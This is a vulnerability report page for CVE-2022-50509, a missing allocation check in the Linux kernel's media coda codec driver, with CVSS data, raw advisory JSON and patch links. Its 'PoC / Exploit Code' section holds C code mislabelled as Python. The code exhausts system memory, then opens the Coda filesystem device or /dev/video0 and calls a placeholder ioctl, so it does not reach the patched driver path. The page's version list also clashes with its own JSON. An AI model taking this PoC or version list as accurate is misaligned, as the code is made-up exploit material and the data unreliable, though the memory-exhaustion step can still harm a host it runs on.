Security Vulnerability Report
中文
CVE-2022-50509 CVSS 5.5 MEDIUM

CVE-2022-50509

Published: 2025-10-07 16:15:33
Last Modified: 2026-03-17 13:59:35
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: media: coda: Add check for kmalloc As the kmalloc may return NULL pointer, it should be better to check the return value in order to avoid NULL poineter dereference, same as the others.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.10.162
Linux Kernel 5.15.x < 5.15.85
Linux Kernel 5.19.x < 5.19.6
Linux Kernel 6.0.x 受影响
Linux Kernel 6.1.x 受影响

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* CVE-2022-50509 PoC - Linux kernel coda driver NULL pointer dereference * This PoC demonstrates triggering the NULL pointer dereference in the coda driver * by exhausting memory before triggering the vulnerable code path. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/mman.h> #include <sys/ioctl.h> #define CODA_DEVICE "/dev/coda" /* Adjust based on actual device path */ /* Exhaust available memory to make kmalloc return NULL */ void exhaust_memory() { /* Allocate memory in chunks until allocation fails */ size_t chunk_size = 1024 * 1024; /* 1MB chunks */ void **ptrs = NULL; int count = 0; int max = 10000; ptrs = malloc(sizeof(void*) * max); if (!ptrs) return; while (count < max) { void *p = mmap(NULL, chunk_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (p == MAP_FAILED) { /* Memory exhausted */ break; } /* Touch the memory to ensure it's actually allocated */ memset(p, 0, chunk_size); ptrs[count++] = p; } printf("[+] Allocated %d MB, memory nearly exhausted\n", count); } /* Trigger the vulnerable coda code path */ void trigger_coda_vuln() { int fd; /* Try to open the coda device */ fd = open(CODA_DEVICE, O_RDWR); if (fd < 0) { printf("[-] Cannot open %s, trying alternative paths\n", CODA_DEVICE); /* Try other potential device paths */ fd = open("/dev/video0", O_RDWR); if (fd < 0) { printf("[-] No coda device found. Manual exploitation required.\n"); return; } } printf("[+] Opened device, triggering vulnerable code path...\n"); /* Perform ioctl operations that trigger kmalloc in coda driver */ /* The specific ioctl depends on the coda driver implementation */ /* This is a placeholder - actual ioctl numbers vary */ int ret = ioctl(fd, 0 /* CODA_IOCTL placeholder */, NULL); printf("[+] ioctl returned: %d\n", ret); close(fd); } int main(int argc, char *argv[]) { printf("[*] CVE-2022-50509 PoC - Linux kernel coda NULL deref\n"); printf("[*] This PoC attempts to trigger NULL pointer dereference\n"); printf("[*] in the coda driver by exhausting memory first.\n\n"); /* Step 1: Exhaust memory to make kmalloc fail */ printf("[*] Step 1: Exhausting system memory...\n"); exhaust_memory(); /* Step 2: Trigger the vulnerable code path in coda driver */ printf("[*] Step 2: Triggering vulnerable coda code path...\n"); trigger_coda_vuln(); printf("[*] Done.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50509", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:33.300", "lastModified": "2026-03-17T13:59:34.587", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: coda: Add check for kmalloc\n\nAs the kmalloc may return NULL pointer,\nit should be better to check the return value\nin order to avoid NULL poineter dereference,\nsame as the others."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.19", "versionEndExcluding": "4.9.337", "matchCriteriaId": "F5C9AB36-1335-46C4-AE68-045ACEB0954D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.303", "matchCriteriaId": "1E7450AD-4739-46F0-B81B-C02E7B35A97B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.270", "matchCriteriaId": "AE8904A3-99BE-4E49-9682-1F90A6373F4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.229", "matchCriteriaId": "A0C0D95E-414A-445E-941B-3EF6A4D3A093"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.86", "matchCriteriaId": "47237296-55D1-4ED4-8075-D00FC85A61EE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0209e70ad496c1fcd85c2ec70e6736fd09f95d14", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/11e32126b3e56c3156fb610d793732acd2bdac4f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/441c05485cf1a29eef05c1fd8281716815283315", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6e5e5defdb8b0186312c2f855ace175aee6daf9b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7a2c66429b04e85fee44d6d9f455327bf23cf49c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/aa17a252dbde432095e390e2092205d4debb12e1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ba9cc9e2035f7a45f5222543265daf7cd51f2530", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d308c4a035b636756786af91e5f39f9d92d7d42a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d9b37ea8869e4e6da90c07a310d819a78cbd23d2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.